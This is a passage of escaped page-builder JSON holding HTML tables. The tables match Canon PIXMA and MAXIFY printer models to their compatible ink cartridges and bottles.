width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment 